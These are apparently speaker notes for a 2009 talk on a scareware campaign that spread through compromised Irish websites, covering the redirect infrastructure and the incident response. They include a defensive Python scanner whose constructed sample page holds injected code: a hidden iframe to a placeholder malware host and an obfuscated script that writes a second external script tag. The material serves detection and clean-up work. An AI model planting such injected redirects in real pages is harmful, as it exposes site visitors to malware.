At the initial IrissCon, in 2009, I discussed the investigation, analysis and resolution of a web application attack that was part of a larger criminal scareware campaign.
Going to define scareware – software that scares the end-user into thinking the computer has an infection; 43 million fake anti-virus download attempts (June-July 09) – Symantec white paper.
Explain why criminals use scareware and their motives. This is to give the audience a reason to care about what you are talking about.
Describe what happened to the end-user computer.
Describe the infrastructure behind the scareware.
Describe the exploit.
Describe how IRISS handled the incident.
Give some recommendations and resources for desktop controls.
Give references.
Answer questions throughout.
IRISS was notified by a member. We confirmed it ourselves through testing, and further through our links with URL/IP/AV vendors and SANS ISC.
Dialog box windows popping up everywhere to scare the end-user. NB – I was able to install AVG and the Sysinternals tools during it.
Looks very much like leading anti-virus/anti-malware desktop solutions.
Log file – adds some realism and professionalism.
Does that not look like the Verisign logo??? At this point, it's "Game Over".
Are you sure? Seriously?
At the last minute, I decided I was uncomfortable with paying the cash. It warns me – emphasises that I will be continuing UNPROTECTED. http://sunbeltblog.blogspot.com/2009/07/new-rogue-tactic-blue-screen-of.html – According to anti-spyware firm Sunbelt Software, this 'Blue Screen of Death' trick is a new trick from July 2009.
The return of the infamous BSOD... this surely has to panic end-users.
For the average end-user, this is the only conceivable output.
We have no concrete facts around how the site was exploited; however, there were quite a few issues with servers from this web farm, and they were running IIS 6 on Windows. Most of the current attacks (confirmed with SANS ISC) are performed with either Gumblar or Asprox. Although the server was running IIS 6.0, the malware did not exploit IIS per se but rather took advantage of weak web application security. Tie in with Eoin's talk later and also highlight where the problems lie. Further information – http://en.wikipedia.org/wiki/Gumblar
This is what happened when the user accessed the site – multiple redirects to external sites that all host malware. The Irish sites are therefore termed intermediaries for the sites that serve the malware. McAfee SiteAdvisor, TrustSource – no good. PDF & SWF – these do not exploit the latest 0-day but some older vulnerabilities (namely the Collab one and util.printf). Difficult to get sites closed down – complexity (slide 14 will expand on this further). Also highlight that the redirects can happen on any site, e.g. the New York Times etc.
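Added example (not IRISS's or the speaker's tooling): a small scanner for the kind of injected code that produces the redirect chain described above, i.e. hidden off-site iframes and obfuscated inline scripts that write a second external script tag. It also serves the clean-up step of scanning the application before restoring service. The sample page, the host name and the placeholder domains are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re
# Constructed sample: a legitimate page with an injected hidden iframe and an
# obfuscated script that writes a second external script tag (placeholder domains).
SAMPLE_HTML = """<html><head><title>Example Shop</title>
<script src="/js/site.js"></script></head><body><p>Welcome</p>
<iframe src="http://malware-host.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://second-hop.example/x.js%22%3E%3C/script%3E'))</script>
</body></html>"""

class InjectionFinder(HTMLParser):
    """Collect iframes and scripts whose targets fall outside the site's own host."""
    def __init__(self, own_host):
        super().__init__()
        self.own_host, self.findings, self._in_script = own_host, [], False

    def _external(self, url):
        host = urlparse(url).hostname
        return host is not None and host != self.own_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and self._external(a.get("src", "")):
            style = a.get("style", "").replace(" ", "")
            hidden = "hidden" in style or "display:none" in style
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            self.findings.append(("iframe", a["src"], "hidden/tiny" if hidden or tiny else "visible"))
        elif tag == "script":
            self._in_script = True
            if self._external(a.get("src", "")):
                self.findings.append(("script-src", a["src"], "external"))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Obfuscated inline script: decode %xx escapes so the next-hop URL becomes visible
        if self._in_script and re.search(r"unescape\(|eval\(|fromCharCode", data):
            decoded = re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), data)
            urls = re.findall(r"https?://[^\s\"'<>]+", decoded)
            self.findings.append(("inline-script", ",".join(urls) or "(no url)", "obfuscated"))

def find_injections(html, own_host):
    """Return (kind, target, note) tuples for suspicious off-site references in html."""
    p = InjectionFinder(own_host)
    p.feed(html)
    return p.findings

print(find_injections(SAMPLE_HTML, "www.example-shop.ie"))
```

Run it over the files of a suspect site (or a saved copy of each page) and pass the site's own host name; every hit is a candidate for removal and for reporting to the URL/AV vendors.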
Comment on the links we have with SANS ISC. Comment on the advanced skills that the 'bad guys' have!!
Exploited sites in Ireland – Irish websites.
Redirects – domains hosted in Russia – Russian name & registrar: Grownclubfest.ru, Poppka.net, https://www.onlinepurchasesolution.com, https://www.securebillingsoftware.com; webst.ru – hosting company.
Still working on closing sites – still serving malware.
Servers physically located in China – Netcraft.
Payment URLs hosted in Canada, registered
Summary of the tools that were used
Contact hosting company/owner.
Possible temporary take-down.
Make IRISS members aware of the malware code.
Encourage the company to disclose to customers (hhhhmmm, keep in?).
Inform SANS, AV, IP reputation sites & URL filtering vendors.
Attempt takedown of malware-serving sites.
Recommended steps – take the site offline momentarily while the code is being removed. Only restore service to the site when it has been cleaned or a back-up has been restored.
Remove the malware code or restore the latest clean back-up.
Scan the application and restore service if clean.
Ask external URL/AV vendors to rescan the site.
Inform customers, if necessary, that the site is back up.
Not sure what to do here – should I be recommending what to do on a web application? Explain how to reduce the risk of this type of attack impacting your server.
Contact hosting company/owner.
Possible temporary take-down.
Make IRISS members aware of the malware code.
Inform SANS, AV & URL filtering vendors.
Attempt takedown of malware-serving sites.
Defence in depth – desktop: AV, anti-spyware, anti-malware, registry cleaners; personal firewall; browser security add-ons.
Add-ons – NoScript, Google Safe Browsing, AVG Toolbar, WOT, AdBlock Plus, Flashblock, ShowIP, Clear Private Data. This scareware only ran on Windows.
Free tools – http://zeltser.com/fighting-malicious-software/lookup-malicious-websites.html, http://zeltser.com/fighting-malicious-software/malicious-ip-blocklists.html, http://zeltser.com/reverse-malware/automated-malware-analysis.html
References –
http://sunbeltblog.blogspot.com/2009/07/new-rogue-tactic-blue-screen-of.html
Google search http://ddanchev.blogspot.com/ for 'scareware' or 'virus'
http://isc.sans.org/ (Thanks to @bojanz)
http://vrt-sourcefire.blogspot.com/2009/11/paranoia-and-rise-of-fake-antivirus.html
http://eval.symantec.com/mktginfo/enterprise/white_papers/b-symc_report_on_rogue_security_software_WP_20016952.en-us.pdf
http://blogs.sans.org/computer-forensics/2009/11/07/lists-for-investigating-malware-incidents/